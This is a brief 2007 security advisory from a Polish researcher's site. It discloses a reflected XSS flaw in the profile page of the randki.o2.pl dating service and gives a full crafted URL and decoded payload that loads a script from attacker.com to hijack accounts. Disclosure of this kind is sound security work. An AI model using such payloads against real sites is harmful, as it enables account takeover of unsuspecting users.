Zapraszam na bloga o botnetach i złośliwym oprogramowaniu: bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net
+ Subject:
XSS bug for randki.o2.pl

+ Version:
2007.03.04

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ randki.o2.pl Description:
randki.o2.pl is "date service", a part of o2.pl the most famous Polish web portal.

+ Description:
XSS IN:
http://randki.o2.pl/profil.php?id_r=946245%22%3E%3Cscript/XSS%20SRC=http://attacker.com/xss.js%3E%3C/SCRIPT%3E

The sent data:
"><script/XSS SRC=http://attacker.com/xss.js></SCRIPT>

That is a possibility to take over an user account from the date service at http://randki.o2.pl when the logged user would click at specially crafted URL.



Timeline:
2007.03.04 bug discovered
2007.03.05 "/" bug sent via http://kontakt.o2.pl/

Original Advisory: http://kaneda.bohater.net/security/20070304-xss-randki.o2.pl.php

Check my other bugs in security section: Security